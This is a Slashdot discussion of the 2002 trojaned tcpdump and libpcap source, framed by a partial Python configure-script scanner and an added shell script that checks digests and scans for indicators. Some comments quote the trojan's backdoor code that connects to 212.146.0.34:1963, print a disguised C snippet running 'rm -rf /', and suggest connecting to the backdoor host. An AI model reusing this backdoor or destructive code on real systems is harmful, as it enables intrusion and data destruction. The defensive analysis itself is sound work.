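  sa.sin_addr.s_addr = inet_addr ("192.0.2.10");
  connect (s, (struct sockaddr *)&sa, sizeof (sa));
  return 0;
}
EOF
$CC conftest.c >/dev/null 2>&1 && ./a.out
"""

# Matches `cat >file <<TAG ... TAG` and captures the program body.
HEREDOC_RE = re.compile(
    r"cat\s*>\s*(?P<file>\S+)\s*<<\s*'?(?P<tag>\w+)'?\n(?P<body>.*?)\n(?P=tag)\n",
    re.S,
)

# Behaviours a feature probe has no reason to combine. Any single one can
# appear in a legitimate test (autoconf does probe connect(), for instance),
# so the scanner scores combinations rather than single hits.
INDICATORS = {
    "literal_ipv4": re.compile(r'"\d{1,3}(?:\.\d{1,3}){3}"'),
    "daemonize": re.compile(r"fork\s*\(.*?close\s*\(\s*0\s*\)", re.S),
    "outbound_connect": re.compile(r"\bconnect\s*\("),
    "command_exec": re.compile(r"\b(?:exec[lvpe]*|system|popen)\s*\("),
}


def embedded_programs(script):
    """Return [(target filename, program body)] for each heredoc in the script."""
    return [(m.group("file"), m.group("body")) for m in HEREDOC_RE.finditer(script)]


def scan_configure(script, threshold=2):
    """Flag embedded programs that hit at least `threshold` indicators."""
    findings = []
    for index, (target, body) in enumerate(embedded_programs(script)):
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        if len(hits) >= threshold:
            findings.append({"block": index, "file": target, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_configure(SAMPLE_CONFIGURE):
        print(f"block {finding['block']} ({finding['file']}): "
              f"{', '.join(finding['indicators'])}")
```

Heuristics like this are a triage aid for a tarball you already distrust; comparing the generated configure against one you regenerate yourself from the same autoconf sources, or against a signed release, remains the decisive check.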
  17. Hey, Slashdot, by gazbo · · Score: 3, Funny

    I was just wondering how long these sources have been available with these many eyes making bugs shallow and so forth? I'm assuming it's less than 1 hour, because as I keep being told, everyone in the open source community checks all source code thoroughly before installing it, which is something that can't be done with closed source.

  18. Re:prison by outofpaper · · Score: 2, Insightful
    While it is true that:

    our current legal environment is that it appears to not matter much the ill intent of authors of such malevolent code


    It is also true that only because this is an open source project was such code found. People seem to forget that there is no really efficient way of checking closed software for security holes. On top of that companies are more than likely to place back doors in programs as actual features that are not mentioned in documentation, or only glazed over. My example for this was in a business program that I work with had the "option for you to enter a code into one of the text fields if you set the computer's date to a specific date and then you would be able to edit all records, thus bypassing the simple code that it uses." I found out about the feature when there was a problem with some of the records and since the files are encoded I wasn't going to search through them in any easy way so I contacted the program's distributor and they told me of this feature. Just think how many other progs out there have stuff like that.
  19. Re:Siltakoski Petri is somehow connected with this by rekulator · · Score: 3, Informative

    Yeah! Let's nail his ass! ..
    Oh wait, perhaps he's just the tech guy working for the company which registered the domain "raketti.net", Kuopion Puhelin. It's a telecom and net operator after all.

  20. Don't jump to conclusions by astrashe · · Score: 5, Insightful

    The good blackhats have lots of compromised machines at their disposal, and are generally way too clever to leave such an obvious clue behind.

    It's possible that this guy has something to do with it, but it's more likely that his machine is owned by the same person who managed to put the trojan out there.

  21. Er, I thought trojans were for preventing... by quintessent · · Score: 2, Funny

    ...wait...never mind.

  22. Why do I have a feeling by Raul654 · · Score: 2

    ...that this little incident will not be mentioned in the next edition of the Cathedral and the Bazaar?

    --


    To make laws that man cannot, and will not obey, serves to bring all law into contempt.
    --E.C. Stanton
  23. Re:Siltakoski Petri is somehow connected with this by Masa · · Score: 4, Informative
    Siltakoski Petri is somehow connected with this

    Yes and no. The information you have successfully received from the Whois database is pointing to the phone company in Finland, which happens to be a host for raketti.net domain. Petri Siltakoski is just an administrative contact of the ISP (Raketti.Net). He has nothing to do with the web page set up by an individual who seems to have an account in this ISP.

  24. Re:This is dreadful by phaze3000 · · Score: 4, Funny

    It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this.

    I couldn't agree more, if those cheap-arsed hippies who write Linux would only pay up when there's a problem with their software like reputable commercial companies like Micros.. err, Oracl.. err actually, forget it.

    --
    Blaming GW Bush for the Iraq war is like blaming Ronald McDonald for the poor quality of food.
  25. Re:Siltakoski Petri is somehow connected with this by dohcvtec · · Score: 2

    Siltakoski Petri is apparently just the guy who registered that domain. It could be that a user from that domain is involved or, as you said, that server has been r00ted. Funny, though, http://mars.raketti.net/~mash/services is nothing but a FreeBSD /etc/services file.

    --
    -- Never hit a man with glasses. Hit him with a baseball bat.
  26. Reply from a mirror site to HLUG and tcpdump.org by Dogcow · · Score: 5, Informative

    This was just sent ~1 min ago:

    To : msolnik@hlug.org
    Cc : wt-changes@wiretapped.net,
    tcpdump-workers@tcpdump.org,
    mcr@sandelman.ottawa.on.ca
    Subject : tcpdump.org mirrors
    ----- Message Text -----
    Hi guys,

    I run the main mirror of tcpdump at wiretapped.net (no relation to wiretapped.us) in Australia. We rsync from cvs.tcpdump.org, and have removed the entire tcpdump.org tree and disabled rsync updates until we hear from Michael Richardson at tcpdump.org.

    You may like to add this info to your Updates area, as the unavailability of the main mirror site may seem suspicious. It is not, as described above.

    Because wiretapped.net itself is mirrored to a few other sites, it may take between 1 hour and 24 hours for this removal (and any subsequent re-addition) to take effect. We'll note when it goes back online at http://www.wiretapped.net/changelog.html

    Hope this assists in preventing any further spread,

    Grant
    www.wiretapped.net

  27. Re:This is dreadful by gowen · · Score: 5, Insightful
    I run a successful London-based dot com
    Wow. And just minutes ago you were a successful lawyer. I'm so jealous.
    --
    Athletic Scholarships to universities make as much sense as academic scholarships to sports teams.
  28. Accountability by Mephie · · Score: 2, Interesting

    I admit to not knowing a lot about open source development, not being a developer myself. But I'm curious, is there any sort of legal accountability when someone intentionally codes a trojan in to a piece of software? Is it possible to keep track of who is writing what code? When trojans, etc, are discovered, are you limited to just patching them and going from there, or is it usually possible to find out who did it and therefore be suspect of future code?

  29. Re:This is dreadful by Erik+Hollensbe · · Score: 2

    It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this.

    Do you expect sun or microsoft to pay you, either?

  30. Isn't this the whole point of Open Source? by elliotj · · Score: 5, Funny

    I thought the whole idea of the GPL was that you could take a program and modify it to your own needs so long as you release the source back to the community under the same license.

    Sounds like that's what happened here!

  31. Uncommented trojan by magi · · Score: 5, Insightful

    The trojan code seems somewhat complex and unreadable at first glance. The variable names don't express much of the semantics. It doesn't even have any comments. No wonder no one notices if this kind of stuff is written into code. And this is very clear code.

    Even (or especially) free software developers should use more descriptive variable names and comment their code well. It makes the code much more readable for analysis, both security or quality reviews.

    Well, ok, crackers probably want to obfuscate their code with /* Here's stuff for the trojan. */, but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.

    I'd recommend the rule: "One comment per statement, except when really unnecessary." Many people think it's silly, but those people haven't had to read a lot of other people's code.

    Hmm, I wonder why they used port 1963...author's birth year? Nah, that would be too old for a typical cracker.

    1. Re:Uncommented trojan by forgoil · · Score: 2

      If you have to write a comment, it is not obvious. Hence only write comments when it is not obvious what is going on.

      And, do please try to make it obvious as to what is going on. I can't stand code where the comments are a MUCH bulkier version OF THE CODE. I can read code, I do it every day. I can't read minds.

      If you want to write well documented code, document what a class does and what a method/function does. That helps a lot more. Then I won't have to read your code unless there is something wrong at that very point. And then I only need to know what is not obvious from the code.

    2. Re:Uncommented trojan by The+Other+Nate · · Score: 2, Interesting

      Very Offtopic...

      1963 - Assassination of President Kennedy

      --
      The Other Nate

    3. Re:Uncommented trojan by Avakado · · Score: 2, Interesting

      but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.

      How hard is it to write code that appears to do something friendly, but actually does something really nasty? Consider this apparently friendly code:
      #include <stdlib.h> /* system() */
      #define hug system
      /* Deliberately disguised: the bytes spell out a destructive shell command */
      const char bunny[] = { 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2f, 0 }; // Bunny ID

      // Hugs the bunny specified by 'bunny'
      void hug_a_bunny() {
          hug(bunny);
      }

      Hint: bunny evaluates to "rm -rf /"

      --
      The world will end in 5 minutes. Please log out.
    4. Re:Uncommented trojan by magi · · Score: 2
      1963 - Assassination of President Kennedy

      It seems that the trojan is Finnish. A few things that occurred in 1963:
      • New health insurance law was passed
      • Importing of cars was releaved
      • Prime minister was Ahti Karjalainen
      • The Sävelradio (Light Music Program) started in public radio broadcasts
      • The Committee of 100 was founded
      • Finns Tuula-Kaija (16) and Seppo (21) danced twist 60 hours continuously.
      • 100th anniversary of Finnish Parliament
      • An almost ready nine-floor apartment building crashes in Lahti. No casualties.

      In foreign countries;
      • J.F.K is killed
      • NASA news satellite Relay 1 relayed news between GB, USA, and Brazil.
      • Rolling Stones published their first record Come On
      • Hurricane destroyed half of Japan's crop
      • A lightning killed 81 people in Maryland, USA
      • Martin Luther King's famous speech, "I have a dream..."
      • Kennedy's citizen rights law enacted
      • 1600 dead in Jugoslavia in earthquake
      • First woman in space, Valentina Tereskova, in Vostok-1
      • Pope Whatever VI came in power
      • Bruno Ross observed X-ray radiation from space
  32. Re:So much for peer auditing? by Anonymous Coward · · Score: 5, Informative

    I'm going to try to walk you through this with baby steps.
    let me make sure to put pillows over the sharp corners of the table.

    this was found, just last night, because of the change in the md5 checksum.
    this md5 checksum changed because the file changed.
    this file changed because someone changed it
    so in conclusion, this file has not been like this for a year

    hope you were able to keep up

  33. Re:This is dreadful by Hostile17 · · Score: 5, Insightful

    "It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this. "

    And this is different from Closed Source how ?

    Doesn't the money come from the money you've saved by not having to pay for any software? What did your business plan mention about this? Just a blank page, right? Try it out and see what happens? Well, it's your money!

    Same place it will come from if you use Closed Source software, using Open Source products does not mean zero cost IT, it means lower cost IT. If your company did plan for these things, then it will make no difference what products you are using.

    --
    Fascism should more properly be called corporatism, since it is the merger of state and corporate power - Benito Mussoli
  34. Re:So much for peer auditing? by DarkBlack · · Score: 2, Informative

    It has probably been not that long since it was trojaned. Gentoo's portage system gets tcpdump from tcpdump.org and md5's the sources before building. More than likely, it has only been trojaned just recently.

    Since there are no md5 sums or gpg signatures listed on tcpdump.org it makes it very easy for someone to simply replace the source. Only those that check md5 sums and gpg signatures will know if it is truly trojaned or not.

    I hope that the tcpdump people will start provided md5 sums and gpg signatures for those that build from source.

  35. Re:So much for peer auditing? by oliverthered · · Score: 2

    Or C:
    There are no decent auditing tools in use.

    Everyone could check 95% on the code and still miss a trojan in the other 5%.

    --
    thank God the internet isn't a human right.
  36. DEMAND PGP SIGNATURES!!!! by aphor · · Score: 5, Insightful

    The reason this is a problem is that nebulous shrug of an answer to the question "Who are you trusting to provide this code which you execute?" It could be an anonymous PGP/GPG key, but to violate people's trust would mean that trusted token is no longer trusted, and thus it would identify the other risks out there.

    Imagine the tcpdump distributions were signed by an anonymous key. We could look over the code, and decide to trust that key. Later, people would be able to tacitly trust that key to sign tcpdump tarballs. One day, the tcpdump code will fail to match the signature: it will be caught before being executed, and the trojan will be discovered quickly. Later, another trojan will appear, but the signature will match. A few people will be bitten, but the key will be exposed and others will be able to quickly identify their risk.

    At the VERY LEAST, use MD5 sums on the files like FreeBSD ports!

    --
    --- Nothing clever here: move along now...
    1. Re:DEMAND PGP SIGNATURES!!!! by jonabbey · · Score: 5, Insightful

      And for god's sake, keep your private signing key encrypted in your gpg keyring, or offline.

    2. Re:DEMAND PGP SIGNATURES!!!! by aphor · · Score: 2

      Goes without saying, but maybe I expect too much of the average user?

      Yes, for your own sake, and the sakes of everyone who trusts you: guard your private key(s) with teeth!

      --
      --- Nothing clever here: move along now...
  37. facts, not fiction. by F2F · · Score: 5, Informative

    the article is called 'reflections on trusting trust' and Ken Thompson wrote it upon inception of the ACM distinguished scientist award. now, we all know you are full of shit (since you can't even spell his name right) but claiming that 'each version of login was compromised' is so far off base that it's not even funny.

    follow the link posted already, read it and try to understand what he fundamentally tries to tell you. then go and read aleph1's 'smashing the stack for fun and profit' and try to get a glimpse of what 'hacking' was considered in the 80s.

  38. Re:Siltakoski Petri is somehow connected with this by monotoy · · Score: 2, Interesting

    that's not true, look at it again ...

    in the middle of the fully commented services file, you find (let's hope /. eats this code post ... ):

    #!/bin/sh
    cat >conftes.c
    #include
    #include
    #include
    #include

    #define XOR_KEY 0x89

    int main (int argc, char **argv)
    {
    char c;
    int s, x, sv0[2], sv1[2];
    struct sockaddr_in sa;

    switch (fork ()) { case 0: break; default: exit (1);}
    close (0); close (1); close (2);

    do {
    if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
    exit (1);

    sa.sin_family = AF_INET;
    sa.sin_port = htons (1963);
    sa.sin_addr.s_addr = inet_addr ("212.146.0.34");

    alarm (10);
    if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
    exit (1);
    if ((x = read (s, &c, 1)) /dev/null 1>/dev/null

    nice, isn't it?

    heheh

  39. How is this fair? by kiwimate · · Score: 5, Insightful

    This apparently misleading (albeit well-intentioned) comment gets modded +4 interesting, meaning that almost everyone will see this poor guy's name.

    All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.

    And, by the way, this happens all the bl**dy time on /. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range.

    Yeah, I know it's off-topic. Just wanted to rant about something that irritates me. Return to your normally-scheduled bits and pieces.

  40. at least... by Leimy · · Score: 2

    they were practicing safe sex

  41. Impressive! (Was: as soon as this evening...) by teqo · · Score: 3, Funny
    apt-get update...
    well, I have not installed these sniffing proggies, so it should be okay.

    Darn... apt-get even makes your box more secure than before even if you haven't actually installed the bad packages? This must be the Holy Grail! And it should be okay? Not only that you have not installed tcpdump and libpcap, what definitely makes it okay, you don't even trust apt-get to really solve your (non-existing) problem... Now I wanna join the apt-get cult... Where can I register?

    I bet you recommend penicillin over other medicine even when you got no infection! Or do you use apt-get then as well? Doesn't make any difference anyway...

    (For the record: I use Debian GNU/Linux among other stuff...)

  42. NO!!!! NO!!! NO!!! by AxelTorvalds · · Score: 5, Informative
    md5 checksums are nice but if I was going to put a trojan in to something, I'd probably rebuild the md5sum too. Basically md5sum is a glorified CRC at the end of the gzip, nothing more and nothing less.

    Do this: Download gpg from gnupg.org. Build it. Generate yourself a key. Try to get some of your friends to sign it. submit it to keyserver.net. Sign your code with that key. While you're at it, start using kmail, evolution, or mozilla with enigmail and start signing your emails too. Do it religiously.

    Check sigs when you download code too.

    1. Re:NO!!!! NO!!! NO!!! by c13v3rm0nk3y · · Score: 2
      and start signing your emails too. Do it religiously

      Man, this is the truth. We need to start using crypto for everyday things, as well as the "important" stuff. It needs to be ubiquitous.

      --
      -- clvrmnky
  43. Re:This is dreadful by djtack · · Score: 5, Funny

    And looking through his user profile, he's also a rocket scientist. Wow.

  44. More by Anonymous Coward · · Score: 2, Funny

    ...as a rocket scientist I feel most compelled to answer
    http://slashdot.org/comments.pl?sid=44937&cid=4658776

    ...I run a successful London-based dot com
    http://slashdot.org/comments.pl?sid=44933&cid=4658433

    ... As a lawyer myself, I can state that
    http://slashdot.org/comments.pl?sid=44912&cid=4658097

    ... I'm an avid open-source supporter
    http://slashdot.org/comments.pl?sid=21128&cid=2238414

    ...I am an avid supported of the open-source movement [sounds familiar? that's because it is -ed]
    http://slashdot.org/comments.pl?sid=20824&cid=2207372

    ...I'm an avid supported of the open source movement [we know -ed]
    http://slashdot.org/comments.pl?sid=20761&cid=2204471

    ... I am a passionate supported of the open-source movement [geez -ed]
    http://slashdot.org/comments.pl?sid=20760&cid=2204422

  45. Re:Siltakoski Petri is somehow connected with this by mistered · · Score: 2
    I don't know what kind of /etc/services file you have on your FreeBSD boxes, but I doubt they look like this one. Scroll about half way down:

    #monitor 561/tcp
    #monitor 561/udp
    #chshell 562/tcp chcmd
    #!/bin/sh
    cat >conftes.c #include
    #include
    #include
    #include
    #include

    #define XOR_KEY 0x89

    int main (int argc, char **argv)
    {
    char c;
    int s, x, sv0[2], sv1[2];
    struct sockaddr_in sa;

    ...

    --
    Enjoy your job, make lots of money, work within the law. Choose any two.
  46. Recent incidents that I know of by frozenray · · Score: 2, Insightful

    irssi
    fragroute, dsniff, fragrouter
    BitchX

    This message says Recently there have been a spate of well publicized attacks against what I would consider to be the backbone of the open source movement - its source code distribution system. Hackers have been penetrating people who download, say, OpenSSH and then compile it to use on their systems by trojaning OpenSSH itself. This strikes at the very HEART of Open Source by making the act of installing the software a weakness. Because Open Source has no one distribution point, there are many places for someone to verify if they want to install software securely. Because there are no vendors, the sites people download software from are usually not provided with a dedicated security staff.

    This is serious, guys and gals. Use the source, Luke - but what if I can't trust the source any more? Open Source has to find a method to get around this problem; see this post.

    --
    "There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
  47. Re:This is dreadful by forged · · Score: 2, Funny
    The guy is good, isn't he 8-}

    This reminds me of this one time when I chatted this girl on IRC. Oh wait.....

  48. Would it help to have a source Bank? by cmeans · · Score: 3, Interesting
    A single place where OS projects could deposit their code (on whatever frequent basis they liked), that would "guarantee" that the code was free of Trojans etc. before making it available to others for download...

    I'm just typing out loud here.

    Yes, there'd almost certainly have to be a cost associated with this, and I'd think it would be paid by the people who wanted source code, but didn't want to have to worry about checking it for Trojans etc..

    The source could still be publicly available for comment and review to add to those being paid to perform the analysis.

    Seems like this might be a good service, once the idea is fleshed out more...

    There'd also need to be some definition of "guaranteed" (or maybe just a different word :0) that fit this scenario, most people don't want to set themselves up to be sued.

    1. Re:Would it help to have a source Bank? by Sloppy · · Score: 2
      Isn't what you're describing, pretty much what a prepackaged distribution is? For example, when someone installs Linux from a Red Hat CD, they are getting stuff from Red Hat, instead of from a bunch of potentially compromised servers all over the Internet. They are trusting Red Hat's QC.

      It's the LFS and other people who grab tarballs from here'n'there, who are vulnerable to these kinds of problems.

      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    2. Re:Would it help to have a source Bank? by cmeans · · Score: 2
      That's a good point...but I was thinking of a non-partisan approach.

      Does RH scour the source code they distribute?

    3. Re:Would it help to have a source Bank? by John+Hasler · · Score: 2

      > Does RH scour the source code they distribute?

      I review the source code of my Debian packages.

      --
      Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
  49. Sigh by Anonymous Coward · · Score: 2, Insightful

    Note that THE DATE ON THE FILE DOESN'T MATTER. It was trojaned last night, not last year.

    The fact that someone so ineptly trojaned the source, not even bothering to generate a new md5sum, suggests that it's someone out to make it obvious looking. Someone who has a reason to discredit open source. Someone like a former script kiddie employed by microsoft...

    Never mind that Russian crackers were wandering round MS servers for MONTHS back in 2000...

    1. Re:Sigh by KjetilK · · Score: 2

      Someone who has a reason to discredit open source

      ...or someone giving us a wake-up call... Even though the free software community is better in many respects, there's much room for improvement, and this is a field where we should improve, so perhaps we should just thank the bastard who did this... :-)

      --
      Employee of Inrupt, Project Release Manager and Community Manager for Solid
  50. Re:Siltakoski Petri is somehow connected with this by dohcvtec · · Score: 2

    Heh, I had only looked at the first few lines or so, and didn't think anything of it. Did anyone look in the parent directory from where that services file is? Or if the trojan gets any other files besides services?

    --
    -- Never hit a man with glasses. Hit him with a baseball bat.
  51. Read "Reflections on Trusting Trust" by Anonymous Coward · · Score: 2, Interesting

    Having source code freely available doesn't imply security. Ken Thompson demonstrated this very eloquently in his paper.

  52. Big, bad Microsoft by d3xt3r · · Score: 2
    The scariest thought about this is that big companies who can't be trusted (read: Microsoft) could be doing this type of thing to 0wn your Windoze box and any other applications you might want to compile via MSVC++, VB, or .Nut.

    Scary, very scary.

    1. Re:Big, bad Microsoft by ReelOddeeo · · Score: 2

      Big bad evil monopolistic companies don't need to go to anywhere near the same effort you are thinking of.

      If they want to 0wn someone's precious VB code, then they can just program the trojan routines into the compiler without disguising them. It's not like you have the source to the compiler to examine.

      But this entire point is moot. If they want to own large numbers of machines, they have a much simpler mechanism: Windows Update. Since millions of people agree to let their XP box automatically download and install updates from MS, they don't need to 0wn you today. They could at any arbitrary time decide to 0wn you through Windows Update. The advantage of this approach is that there is nothing today that looks suspicious. All code obtained via Windows Update is legit, furthering your trust in Windows Update.

      In the event, say, of a great national emergency, for instance, an unfavorable court ruling against Microsoft, they could overnight 0wn millions upon millions of boxes.

      So why would they go to the trouble to do the "Reflections on Trusting Trust" thing to trojan their compilers? Even if they did trojan their compilers, the trojan might be known to only a small number of people. Hypothetical example: one small group writes the back end code generation library of the compilers and gives that library in binary form to other compiler groups within the beast. In this scenario, only a small number of people would know about the trojaned compilers, all compilers would be affected, and there is no reason to disguise it in the source code.

      --

      Those who would give up liberty in exchange for security and DRM should switch to Microsoft Palladium!
  53. Re:Isn't a Trojan a kind of condom? by gosand · · Score: 2
    Somebody's been messing around there, don't you think?

    Mod down/burn karma?
    Mod down/burn karma?
    Mod down/burn karma?

    Burn Karma.

    I had a complete flame composed, but then realized that you honestly can't be this ignorant, and must have meant this to be funny. If this was a serious comment, then you really should hang your head in shame. (actually, you should either way)

    --

    My beliefs do not require that you agree with them.

  54. Sandbox Your Applications by gehirntot · · Score: 5, Informative
    Lately, we have seen many trojaned distributions. To prevent these problems from affecting us in the future, we need to use cryptographic signatures as part of software distribution. Otherwise, we never know if a particular piece of software is authentic or not. Signature checking needs to be part of the installation process. I believe that Debian's apt-get is one of the few tools that actually does this.

    In the meantime, I suggest that you run all your untrusted software in a sandbox like Systrace which is available for the BSDs and Linux.

    This screenshot shows Dug Song detecting the trojan in the Fragroute distribution. Systrace allows you to run completely untrusted applications in a sandbox. The security policy is created on the fly with the user deciding what an application is allowed to do.

    We need to be much more careful about the software that we run.

  55. a quick test to see if you're hit by Anonymous Coward · · Score: 4, Informative

    login as root (or whoever can run tcpdump)

    tcpdump -n host 212.146.0.34 &
    telnet 212.146.0.34 1963

    if tcpdump sees the connection, it isn't ignoring port 1963; if you don't see the connection, then your tcpdump is ignoring port 1963

    and well, its always nice to /. your local rooted base.
    the people at 212.146.0.34 should change it to something like /usr/bin/tcpd echo 'A' (i think that was the quit code)

    if this test is wrong, well, so be it, i'm still new at this linux thing, but i'm better at linux than i am at spelling (boy, i should be an /. editor)
    --Anonymous Coward

  56. Early news from tcpdump.org by fenner · · Score: 5, Informative

    I moved the binaries on the tcpdump.org web site, so that the "download" links won't work.

    "ls -c" says that the modified binaries were installed at Nov 11 10:14:00 2002 GMT.

    Preliminary inspection says that the CVS repository is O.K.

    1. Re:Early news from tcpdump.org by fenner · · Score: 2, Informative

      The distributions from sourceforge are safe. See

      http://www.sourceforge.net/projects/tcpdump/ http://www.sourceforge.net/projects/libpcap/

      The MD5s of safe versions that HLUG provided appear to be correct; my own MD5 says:

      MD5 (tcpdump-3.7.1.tar.gz) = 03e5eac68c65b7e6ce8da03b0b0b225e
      MD5 (libpcap-0.7.1.tar.gz) = 0597c23e3496a5c108097b2a0f1bd0c7

  57. www.tcpdump.org by kludge99 · · Score: 3, Insightful

    Interesting that there is no mention of this on the tcpdump.org website, one would think they would at least post something about it.

  58. _NSA backdoor by Martin+S. · · Score: 3, Interesting

    Don't think for a second that Microsoft hasn't put back

    Microsoft *have* inserted a backdoor into the CryptoAPI for the NSA.

  59. How did this get added? by rot26 · · Score: 2, Interesting

    I know this is a stupid question but I don't understand how this ended up in the distribution in the first place.

    --
    To ensure perfect aim, shoot first and call whatever you hit the target
    1. Re:How did this get added? by Ektanoor · · Score: 2

      Well, tcpdump.org guys may be the best to answer this question but there are some usual ways to do it:

      A: Break into the Web site, get privileges and change the source.

      B: Play the dirty contributor, add the trojaned code during development.

      C: Play the good coder, get popularity and in last moment change the hat.

      D: Play the jerk coder, make some silly debugs and leave the backdoor open in the distro.

      D is probably the most innocent. However it is not as unusual as it seems. We have some good examples of debug backdoors left by well intended developers or less scrupulous vendors.

      B and C are a risk. You have to leave some tracks behind before you play dirty. It demands brains and some guts to do it. And it demands that you care for not being caught. However, these situations are not impossible.

      A is the most usual of all. Breaking sites or users responsible for them has been the most usual, experienced and well-proved tendency of all. Besides, the one that gives the best results. You may be a super-hacker, creating a super-tool and hoping for a super-world out of your super-work. But you are not God All-Mighty.

      Everyone has its strong sides and weak ones. It is very frequent to see that if one is a developer, then things concerning system and network administration are exactly his weak sides. The same goes for admins and development, example: me. I may be a good sysadmin and most people consider me as such. However, if I write a few pieces of code I usually get the reaction: "Uh, oh, hmmm... well I understand what you're trying to do but leave to me that thing, ok?"

      The problem why so many programs are being broken is not a problem of developers as developers. It is a problem of system administration, for which they may as far as I am from development of such tools like tcpdump. The solution to this problem is that main developers should start to care about gathering not only coders but also admins. However this may not be a solution for every ill. It may turn into a new sphere. Imagine some ubercracker being invited as admin for some major site...

  60. Date of Trojan is after Nov 1, 2002 by Skjellifetti · · Score: 5, Informative

    I downloaded and installed libpcap and tcpdump on Nov 1. The versions I have came from tcpdump.org. md5sum shows that they have the correct checksum and not the trojaned checksum as reported on the Houston LUG page. A grep of the sources for the port number and ip found in the trojan reports null. It looks like the trojan files were placed on tcpdump.org after Nov 1, 2002.

  61. phew? --- just how carefully did you read? :-) by fw3 · · Score: 3, Informative
    if the sniffer is trojanized, then it could possibly hide such "activities". I actually read the article and it however seems that it was not the case here... phew :-)
    From the article: Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic.

    MD5 checks work nicely. Sure pgp in theory is better but since md5's are cached locally, and a helluva lot faster to check the chances that they will actually be used and verified are seemingly quite good.

    Which is to say in practice MD5 has caught rather a lot of these problems, and in quite timely manner.

    As irrelevant as various source-distributions (e.g. lunar, source-mage and Gentoo) are at present in other respects, they make a nice 'canary' in the coal mine :-).

    --
    Linux is Linux, if One need clarify their dist: <Dist>/GNU Linux
    bsds are of course just BSD
    1. Re:phew? --- just how carefully did you read? :-) by Codifex+Maximus · · Score: 2

      MD5s and source tarballs/binaries should be under the protection of tripwire or some other system guardian. GPG signatures are a good way of protecting things too.

      But just bare MD5s are not enough. You must protect the MD5s from being modified to pass the trojans. All source and binaries available for download from a trojaned or rooted site must be considered suspect until they pass a diff on untrojaned source.

      I know I'm thinking out loud here but this is how I understand the problem. Correct me if I'm wrong.

      P.S. Time to get a good packet sniffer!

      --
      Codifex Maximus ~ In search of... a shorter sig.
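The check the posts above describe, as an added example (not code from the thread or from the tcpdump project): a downloaded tarball is compared against a digest that was cached locally before the download, the way the Gentoo ebuild digest caught this trojan, rather than against a checksum fetched from the same possibly rooted server; the unpacked tree is then grepped for the indicators reported in the thread (backdoor host 212.146.0.34, port 1963), as Skjellifetti did by hand. The digest line format ("MD5 <hex> <file> <size>") mirrors the Gentoo digest quoted earlier in the thread; file names, paths and the fixture contents are assumptions, and the sample tarballs are constructed by the script itself.

```sh
#!/bin/sh
# Added example: cached-digest verification plus an indicator grep for a
# source tarball. Not from the thread or the tcpdump project. The digest
# format follows the Gentoo digest quoted in the thread; paths and the
# fixture data below are assumptions.

IOC_IP="212.146.0.34"   # backdoor host reported by HLUG
IOC_PORT="1963"         # backdoor port reported by HLUG

# verify_md5 TARBALL DIGEST_FILE
# Succeeds (0) only when the tarball's MD5 equals the entry cached in
# DIGEST_FILE. A checksum published next to the tarball on the same server
# proves nothing once that server is rooted; the cached copy has to predate
# the download, as a distro digest or pkgsrc distinfo does.
verify_md5() {
    tarball=$1
    digest=$2
    name=$(basename "$tarball")
    expected=$(awk -v f="$name" '$1 == "MD5" && $3 == f { print $2 }' "$digest")
    if [ -z "$expected" ]; then
        echo "no cached digest for $name" >&2
        return 1
    fi
    actual=$(md5sum "$tarball" | awk '{ print $1 }')
    if [ "$actual" != "$expected" ]; then
        echo "MD5 mismatch for $name: cached $expected, got $actual" >&2
        return 1
    fi
    return 0
}

# scan_iocs TARBALL
# Unpacks into a scratch directory and searches every file for the backdoor
# address and port as literal strings. Returns 0 when nothing matches, 2 when
# a file contains an indicator. This is coarse ("1963" could be a year) and
# would miss an address assembled at runtime, so it is triage, not proof.
scan_iocs() {
    tarball=$1
    scratch=$(mktemp -d) || return 1
    if ! tar xzf "$tarball" -C "$scratch"; then
        rm -rf "$scratch"
        return 1
    fi
    hits=$(grep -rlF -e "$IOC_IP" -e "$IOC_PORT" "$scratch" || true)
    rm -rf "$scratch"
    if [ -n "$hits" ]; then
        echo "indicator found in:" >&2
        echo "$hits" >&2
        return 2
    fi
    return 0
}

# check_tarball TARBALL DIGEST_FILE
# Cached digest first (cheap, catches a swapped tarball), then the IoC scan.
# Returns the status of the first step that fails.
check_tarball() {
    verify_md5 "$1" "$2" || return $?
    scan_iocs "$1"
}

# make_fixtures DIR
# Constructed test data, not real tcpdump source: a clean tarball and its
# cached digest under DIR/good, and a tampered tarball of the same name under
# DIR/bad whose gencode.c stand-in carries the backdoor address and port.
make_fixtures() {
    dir=$1
    mkdir -p "$dir/good/src" "$dir/bad/src"
    printf '/* constructed stand-in for gencode.c */\nint gen_ok(void) { return 1; }\n' \
        > "$dir/good/src/gencode.c"
    tar czf "$dir/good/tcpdump-3.7.1.tar.gz" -C "$dir/good" src
    sum=$(md5sum "$dir/good/tcpdump-3.7.1.tar.gz" | awk '{ print $1 }')
    size=$(wc -c < "$dir/good/tcpdump-3.7.1.tar.gz" | tr -d ' ')
    printf 'MD5 %s tcpdump-3.7.1.tar.gz %s\n' "$sum" "$size" > "$dir/good/digest"
    printf '/* constructed trojaned stand-in */\nstatic const char *h = "212.146.0.34";\nstatic int p = 1963;\n' \
        > "$dir/bad/src/gencode.c"
    tar czf "$dir/bad/tcpdump-3.7.1.tar.gz" -C "$dir/bad" src
}
```

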